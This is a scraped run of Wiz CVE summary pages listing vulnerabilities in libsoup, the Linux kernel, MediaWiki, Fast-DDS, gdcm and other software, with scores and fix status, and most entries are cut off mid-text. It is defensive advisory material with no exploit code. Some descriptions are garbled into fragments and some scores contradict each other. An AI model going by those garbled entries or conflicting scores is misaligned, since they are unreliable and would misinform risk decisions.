Debian 14 Severity HIGH No Fix Added at: Nov 19, 2025
Echo Severity HIGH No Fix Added at: Nov 19, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can
Wiz
CVE-2026-4271 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-4271 [MEDIUM] CVE-2026-4271 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4271 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in libsoup, a library for handling HTTP requests. This vulnerability, known as a Use-After-Free, occurs in the HTTP/2 server implementation. A remote attacker can exploit this by sending specially crafted HTTP/2 requests that cause authentication failures. This can lead to the application attempting to access memory that has already been freed, potentially causing application instability or crashes, resulting in a Denial of Service (DoS).
Source : NVD
## 7.5
Score
Published March 17, 2026
Severity HIGH
CNA Score 5.3
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Perc
Wiz
CVE-2026-1425 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.3
CVE-2026-1425 [MEDIUM] CVE-2026-1425 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1425 :
Linux Debian vulnerability analysis and mitigation
A security flaw has been discovered in pymumu SmartDNS up to 47.1. This vulnerability affects the function _dns_decode_rr_head/_dns_decode_SVCB_HTTPS of the file src/dns.c of the component SVBC Record Parser. The manipulation results in stack-based buffer overflow. It is possible to launch the attack remotely. A high complexity level is associated with this attack. It is stated that the exploitability is difficult. The patch is identified as 2d57c4b4e1add9b4537aeb403f794a084727e1c8. Applying a patch is advised to resolve this issue.
Source : NVD
## 6.3
Score
Published January 26, 2026
Severity MEDIUM
CNA Score 6.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA K
Wiz
CVE-2023-54232 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2023-54232 CVE-2023-54232 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54232 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
m68k: Only force 030 bus error if PC not in exception table
__get_kernel_nofault() does copy data in supervisor mode when
forcing a task backtrace log through /proc/sysrq_trigger.
This is expected cause a bus error exception on e.g. NULL
pointer dereferencing when logging a kernel task has no
workqueue associated. This bus error ought to be ignored.
Our 030 bus error handler is ill equipped to deal with this:
Whenever ssw indicates a kernel mode access on a data fault,
we don't even attempt to handle the fault and instead always
send a SEGV signal (or panic). As a result, the check
for exception handling at the fault PC (buried in
send_sig_fault()
Wiz
CVE-2025-67475 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-67475 [MEDIUM] CVE-2025-67475 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67475 :
Linux Debian vulnerability analysis and mitigation
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation MediaWiki. This vulnerability is associated with program files includes/CommentFormatter/CommentParser.Php.
This issue affects MediaWiki: from * before 1.39.16, 1.43.6, 1.44.3, 1.45.1.
Source : NVD
Published February 3, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Dec 12, 2025
Wiz
CVE-2026-3408 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-3408 [MEDIUM] CVE-2026-3408 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3408 :
Linux Debian vulnerability analysis and mitigation
A vulnerability was identified in Open Babel up to 3.1.1. This impacts the function OBAtom::GetExplicitValence of the file isrc/atom.cpp of the component CDXML File Handler. Such manipulation leads to null pointer dereference. The attack can be launched remotely. The exploit is publicly available and might be used. The name of the patch is e23a224b8fd9d7c2a7cde9ef4ec6afb4c05aa08a. It is best practice to apply a patch to resolve this issue.
Source : NVD
## 5.3
Score
Published March 2, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 21.7
Expl
Wiz
CVE-2025-71270 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2025-71270 [MEDIUM] CVE-2025-71270 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71270 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
LoongArch: Enable exception fixup for specific ADE subcode
This patch allows the LoongArch BPF JIT to handle recoverable memory
access errors generated by BPF_PROBE_MEM* instructions.
When a BPF program performs memory access operations, the instructions
it executes may trigger ADEM exceptions. The kernel’s built-in BPF
exception table mechanism (EX_TYPE_BPF) will generate corresponding
exception fixup entries in the JIT compilation phase; however, the
architecture-specific trap handling function needs to proactively call
the common fixup routine to achieve exception recovery.
do_ade(): fix EX_TYPE_BPF memory access exceptions for BPF programs,
en
Wiz
CVE-2026-1837 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-1837 [HIGH] CVE-2026-1837 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1837 :
Linux Debian vulnerability analysis and mitigation
A specially-crafted file can cause libjxl's decoder to write pixel data to uninitialized unallocated memory. Soon after that data from another uninitialized unallocated region is copied to pixel data.
This can be done by requesting color transformation of grayscale images to another grayscale color space. Buffers allocated for 1-float-per-pixel are used as if they are allocated for 3-float-per-pixel. That happens only if LCMS2 is used as CMS engine. There is another CMS engine available (selected by build flags).
Source : NVD
## 8.7
Score
Published February 11, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release D
Wiz
CVE-2026-4538 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-4538 [MEDIUM] CVE-2026-4538 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4538 :
Linux Debian vulnerability analysis and mitigation
A vulnerability was identified in PyTorch 2.10.0. The affected element is an unknown function of the component pt2 Loading Handler. The manipulation leads to deserialization. The attack can only be performed from a local environment. The exploit is publicly available and might be used. The project was informed of the problem early through a pull request but has not reacted yet.
Source : NVD
## 4.8
Score
Published March 22, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.7
Exploitation Probability (EPSS) N/A
Affected packages and librarie
Wiz
CVE-2025-69725 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.7
CVE-2025-69725 [MEDIUM] CVE-2025-69725 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-69725 :
Linux Debian vulnerability analysis and mitigation
An Open Redirect vulnerability in the go-chi/chi >=5.2.2 RedirectSlashes function allows remote attackers to redirect victim users to malicious websites using the legitimate website domain.
Source : NVD
## 4.7
Score
Published February 19, 2026
Severity MEDIUM
CNA Score 4.7
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
osbuild-composer-worker
gh
Sources
NVD
Debian 11 Severity MEDIUM No Fix Added at: Feb 21, 2026
Debian 14 Severity MEDIUM Has Fix Added at: Feb 21, 2026
Red Hat 8 Severity
Wiz
CVE-2025-31648 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 1.8
CVE-2025-31648 [LOW] CVE-2025-31648 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-31648 :
Linux Debian vulnerability analysis and mitigation
Improper handling of values in the microcode flow for some Intel(R) Processor Family may allow an escalation of privilege. Startup code and smm adversary with a privileged user combined with a high complexity attack may enable escalation of privilege. This result may potentially occur via local access when attack requirements are present with special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (low), integrity (low) and availability (none) of the vulnerable system, resulting in subsequent system confidentiality (low), integrity (low) and availability (none) impacts.
Source : NVD
## 1.8
Score
Published February 10, 2026
Severity LOW
CNA Score 1
Wiz
CVE-2025-62603 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 1.7
CVE-2025-62603 [LOW] CVE-2025-62603 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-62603 :
Linux Debian vulnerability analysis and mitigation
message_data
DataHolderSeq
readParticipantGenericMessage → readDataHolderSeq
DataHolderSeq
uint32
class_id
DDS:Auth:PKI-DH:1.0+Req
DataHolderSeq
Source : NVD
## 1.7
Score
Published February 3, 2026
Severity LOW
CNA Score 1.7
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
fastdds
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Nov 19, 2025
Debian 14 Severity HIGH No Fix Added at: Nov 19, 2025
Echo Severity HIGH No Fix Added at: Nov 19, 2025
## Get a CVE risk assessment
Get
Wiz
CVE-2025-67108 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 10.0
CVE-2025-67108 [CRITICAL] CVE-2025-67108 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67108 :
Echo vulnerability analysis and mitigation
eProsima Fast-DDS v3.3 was discovered to contain improper validation for ticket revocation, resulting in insecure communications and connections.
Source : NVD
## 10
Score
Published December 23, 2025
Severity CRITICAL
CNA Score 10.0
Affected Technologies
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14
Exploitation Probability (EPSS) N/A
Affected packages and libraries
fastdds
Sources
NVD
Echo Severity CRITICAL No Fix Added at: Dec 24, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Echo vulnerabilitie
Wiz
CVE-2026-31409 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-31409 [MEDIUM] CVE-2026-31409 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31409 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: unset conn->binding on failed binding request
When a multichannel SMB2_SESSION_SETUP request with
SMB2_SESSION_REQ_FLAG_BINDING fails ksmbd sets conn->binding = true
but never clears it on the error path. This leaves the connection in
a binding state where all subsequent ksmbd_session_lookup_all() calls
fall back to the global sessions table. This fix it by clearing
conn->binding = false in the error path.
Source : NVD
Published April 6, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile
Wiz
CVE-2026-2049 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-2049 [MEDIUM] CVE-2026-2049 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2049 :
Linux Debian vulnerability analysis and mitigation
[ZDI-CAN-28618: New Vulnerability Report at rgbe.c]
Source : NVD
Published February 17, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Amazon Linux
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
gegl-devel
gegl
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Feb 16, 2026
Echo Has Fix Added at: Feb 16, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Linux Debian vulnerabilities:
CVE ID
Severity
Score
Technologies
Co
Wiz
CVE-2026-5673 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-5673 [MEDIUM] CVE-2026-5673 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-5673 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in libtheora. This heap-based out-of-bounds read vulnerability exists within the AVI (Audio Video Interleave) parser, specifically in the avi_parse_input_file() function. A local attacker could exploit this by tricking a user into opening a specially crafted AVI file containing a truncated header sub-chunk. This could lead to a denial-of-service (application crash) or potentially leak sensitive information from the heap.
Source : NVD
## 5.6
Score
Published April 6, 2026
Severity MEDIUM
CNA Score 5.6
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.6
Wiz
CVE-2022-50775 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2022-50775 [MEDIUM] CVE-2022-50775 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50775 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
RDMA/hns: Fix refcount leak in hns_roce_mmap
rdma_user_mmap_entry_get_pgoff() takes the reference.
Add missing rdma_user_mmap_entry_put() to release the reference.
Acked-by Haoyue Xu [email protected]
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-aws-fips
linux-azure-fips
Sources
NVD
Debian 12, 13, 14 Has Fix Added at: Dec 26, 2025
Echo Has Fix Added at: De
Wiz
CVE-2026-26223 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2026-26223 [MEDIUM] CVE-2026-26223 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26223 :
Linux Debian vulnerability analysis and mitigation
SPIP before 4.4.8 allows cross-site scripting (XSS) in the private area via malicious iframe tags. The application does not properly sandbox or escape iframe content in the back-office, allowing an attacker to inject and execute malicious scripts. The fix adds a sandbox attribute to iframe tags in the private area. This vulnerability is not mitigated by the SPIP security screen.
Source : NVD
## 5.1
Score
Published February 19, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.2
Exploitation Probability (EPSS) 0.1
Affected packages and lib
Wiz
CVE-2026-22034 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
CVE-2026-22034 [CRITICAL] CVE-2026-22034 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22034 :
Linux Debian vulnerability analysis and mitigation
Snuffleupagus is a module that raises the cost of attacks against website by killing bug classes and providing a virtual patching system. On deployments of Snuffleupagus prior to version 0.13.0 with the non-default upload validation feature enabled and configured to use one of the upstream validation scripts based on Vulcan Logic Disassembler (VLD) while the VLD extension is not available to the CLI SAPI, all files from multipart POST requests are evaluated as PHP code. The issue was fixed in version 0.13.0.
Source : NVD
## 9.2
Score
Published January 8, 2026
Severity CRITICAL
CNA Score 9.2
Affected Technologies
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KE
Wiz
CVE-2026-23384 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23384 [MEDIUM] CVE-2026-23384 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23384 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
RDMA/ionic: Fix kernel stack leak in ionic_create_cq()
struct ionic_cq_resp resp {
__u32 cqid[2]; // offset 0 - PARTIALLY SET (see below)
__u8 udma_mask; // offset 8 - SET (resp.udma_mask = vcq->udma_mask)
__u8 rsvd[7]; // offset 9 - NEVER SET udma_mask & BIT(udma_idx)). The array has 2 entries but
udma_count could be 1, meaning cqid[1] might never be written via
ionic_create_cq_common(). If udma_mask only has bit 0 set, cqid[1] (4
bytes) is also leaked. So potentially 11 bytes leaked.
Source : NVD
Published March 25, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
Wiz
CVE-2026-3706 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-3706 [MEDIUM] CVE-2026-3706 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3706 :
Linux Debian vulnerability analysis and mitigation
A vulnerability was determined in mkj Dropbear up to 2025.89. Impacted is the function unpackneg of the file src/curve25519.c of the component S Range Check. This manipulation causes improper verification of cryptographic signature. The attack can be initiated remotely. The attack is considered to have high complexity. The exploitability is considered difficult. The actual existence of this vulnerability is currently in question. Patch name: fdec3c90a15447bd538641d85e5a3e3ac981011d. To fix this issue, it is recommended to deploy a patch. The project maintainer explains: "Signature Malleability is not exploitable in SSH protocol. (...) [A] PoC doesn't exist for SSH implementation, but rather it's against the internal AP
Wiz
CVE-2026-26076 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-26076 [MEDIUM] CVE-2026-26076 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26076 :
Linux Debian vulnerability analysis and mitigation
ntpd-rs is a full-featured implementation of the Network Time Protocol. Prior to 1.7.1, an attacker can remotely induce moderate increases (2-4 times above normal) in cpu usage. When having NTS enabled on an ntpd-rs server, an attacker can create malformed NTS packets that take significantly more effort for the server to respond to by requesting a large number of cookies. This can lead to degraded server performance even when a server could otherwise handle the load. This vulnerability is fixed in 1.7.1.
Source : NVD
## 6.9
Score
Published February 12, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
Wiz
CVE-2026-23175 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.0
CVE-2026-23175 [HIGH] CVE-2026-23175 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23175 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
net: cpsw: Execute ndo_set_rx_mode callback in a work queue
Commit 1767bb2d47b7 ("ipv6: mcast: Don't hold RTNL for
IPV6_ADD_MEMBERSHIP and MCAST_JOIN_GROUP.") removed the RTNL lock for
IPV6_ADD_MEMBERSHIP and MCAST_JOIN_GROUP operations. However, this
change triggered the following call trace on my BeagleBone Black board:
WARNING: net/8021q/vlan_core.c:236 at vlan_for_each+0x120/0x124, CPU#0: rpcbind/481
RTNL: assertion failed at net/8021q/vlan_core.c (236)
Modules linked in:
CPU: 0 UID: 997 PID: 481 Comm: rpcbind Not tainted 6.19.0-rc7-next-20260130-yocto-standard+ #35 PREEMPT
Hardware name: Generic AM33XX (Flattened Device Tree)
Call trace:
unwind
Wiz
CVE-2025-68323 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2025-68323 CVE-2025-68323 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68323 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
usb: typec: ucsi: fix use-after-free caused by uec->work
The delayed work uec->work is scheduled in gaokun_ucsi_probe()
but never properly canceled in gaokun_ucsi_remove(). This creates
use-after-free scenarios where the ucsi and gaokun_ucsi structure
are freed after ucsi_destroy() completes execution, while the
gaokun_ucsi_register_worker() might be either currently executing
or still pending in the work queue. The already-freed gaokun_ucsi
or ucsi structure may then be accessed.
Furthermore, the race window is 3 seconds, which is sufficiently
long to make this bug easily reproducible. The following is the
trace captured by KASAN:
BUG: KASAN: sla
Wiz
CVE-2023-54167 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2023-54167 [MEDIUM] CVE-2023-54167 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54167 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
m68k: mm: Move initrd phys_to_virt handling after paging_init()
When booting with an initial ramdisk on platforms where physical memory
does not start at address zero (e.g. on Amiga):
initrd: 0ef0602c - 0f800000
Zone ranges:
DMA [mem 0x0000000008000000-0x000000f7ffffffff]
Normal empty
Movable zone start for each node
Early memory node ranges
node 0: [mem 0x0000000008000000-0x000000000f7fffff]
Initmem setup node 0 [mem 0x0000000008000000-0x000000000f7fffff]
Unable to handle kernel access at virtual address (ptrval)
Oops: 00000000
Modules linked in:
PC: [] memcmp+0x28/0x56
As phys_to_virt() relies on m68k_memoffset and module_fixup(), it must
not be
Wiz
CVE-2025-68205 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-68205 [MEDIUM] CVE-2025-68205 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68205 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ALSA: hda/hdmi: Fix breakage at probing nvhdmi-mcp driver
After restructuring and splitting the HDMI codec driver code, each
HDMI codec driver contains the own build_controls and build_pcms ops.
A copy-n-paste error put the wrong entries for nvhdmi-mcp driver; both
build_controls and build_pcms are swapped. Unfortunately both
callbacks have the very same form, and the compiler didn't complain
it, either. This resulted in a NULL dereference because the PCM
instance hasn't been initialized at calling the build_controls
callback.
Fix it by passing the proper entries.
Source : NVD
Published December 16, 2025
CNA Score N/A
Affected Technologies
Lin
Wiz
CVE-2016-20040 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2016-20040 [HIGH] CVE-2016-20040 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2016-20040 :
Linux Debian vulnerability analysis and mitigation
TiEmu 3.03-nogdb+dfsg-3 contains a buffer overflow vulnerability in the ROM parameter handling that allows local attackers to crash the application or execute arbitrary code. Attackers can supply an oversized ROM parameter to the tiemu command-line interface to overflow the stack buffer and overwrite the instruction pointer with malicious addresses.
Source : NVD
## 8.6
Score
Published March 28, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
tiemu
Sources
NVD
Debian 1
Wiz
CVE-2026-23263 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23263 [MEDIUM] CVE-2026-23263 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23263 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
io_uring/zcrx: fix page array leak
d9f595b9a65e ("io_uring/zcrx: fix leaking pages on sg init fail") fixed
a page leakage but didn't free the page array, release it as well.
Source : NVD
Published March 18, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-azure-fde
linux-oem-6.17
Sources
NVD
Debian 14 Has Fix Added at: Mar 19, 2026
Ubuntu 16.04, 18.04, 20.04 Severity MEDIUM No Fix Added at: Mar 20, 202
Wiz
CVE-2026-5317 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-5317 [MEDIUM] CVE-2026-5317 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-5317 :
Linux Debian vulnerability analysis and mitigation
A security flaw has been discovered in Nothings stb up to 1.22. This affects the function start_decoder of the file stb_vorbis.c. The manipulation results in out-of-bounds write. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 5.3
Score
Published April 2, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
l
Wiz
CVE-2025-48429 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.4
CVE-2025-48429 [HIGH] CVE-2025-48429 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-48429 :
Linux Debian vulnerability analysis and mitigation
An out-of-bounds read vulnerability exists in the RLECodec::DecodeByStreams functionality of Grassroot DICOM 3.024. A specially crafted DICOM file can lead to leaking heap data. An attacker can provide a malicious file to trigger this vulnerability.
Source : NVD
## 9.1
Score
Published December 16, 2025
Severity CRITICAL
CNA Score 7.4
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.8
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
gdcm
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Dec 18, 2025
Debian 14 Severity CRITICAL No Fix A
Wiz
CVE-2025-62599 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2025-62599 [HIGH] CVE-2025-62599 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-62599 :
Linux Debian vulnerability analysis and mitigation
Fast DDS is a C++ implementation of the DDS (Data Distribution Service) standard of the OMG (Object Management Group
). Prior to versions 3.4.1, 3.3.1, and 2.6.11, when the security mode is enabled, modifying the DATA Submessage within an
SPDP packet sent by a publisher causes an Out-Of-Memory (OOM) condition, resulting in remote termination of Fast-DDS. If t
he fields of PID_IDENTITY_TOKEN or PID_PERMISSION_TOKEN in the DATA Submessage — specifically by tampering with the length
field in readPropertySeq — are modified, an integer overflow occurs, leading to an OOM during the resize operation. Versi
ons 3.4.1, 3.3.1, and 2.6.11 patch the issue.
Source : NVD
## 1.7
Score
Published February 3, 2026
Severity LOW
Wiz
CVE-2026-24885 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.7
CVE-2026-24885 [MEDIUM] CVE-2026-24885 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24885 :
Linux Debian vulnerability analysis and mitigation
Kanboard is project management software focused on Kanban methodology. Prior to 1.2.50, a Cross-Site Request Forgery (CSRF) vulnerability exists in the ProjectPermissionController within the Kanboard application. The application fails to strictly enforce the application/json Content-Type for the changeUserRole action. Although the request body is JSON, the server accepts text/plain, allowing an attacker to craft a malicious form using the text/plain attribute. Which allows unauthorized modification of project user roles if an authenticated admin visits a malicious site This vulnerability is fixed in 1.2.50.
Source : NVD
## 8
Score
Published February 10, 2026
Severity HIGH
CNA Score 5.7
Affected Technologies
Wiz
CVE-2022-50759 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2022-50759 [MEDIUM] CVE-2022-50759 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50759 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
media: i2c: ov5648: Free V4L2 fwnode data on unbind
The V4L2 fwnode data structure doesn't get freed on unbind, which leads to
a memleak.
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-azure-fde
linux-fips
Sources
NVD
Debian 12, 13, 14 Has Fix Added at: Dec 26, 2025
Echo Has Fix Added at: Dec 26, 2025
Ubuntu 16.04, 18.04, 20.04 Severity MEDIUM No Fix Added at: Dec
Wiz
CVE-2025-53618 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.4
CVE-2025-53618 [HIGH] CVE-2025-53618 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-53618 :
Linux Debian vulnerability analysis and mitigation
grayscale_convert
Source : NVD
## 9.1
Score
Published December 16, 2025
Severity CRITICAL
CNA Score 7.4
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
gdcm
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Dec 18, 2025
Debian 14 Severity CRITICAL No Fix Added at: Dec 18, 2025
Echo Severity CRITICAL No Fix Added at: Dec 18, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related L
Wiz
CVE-2023-54109 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
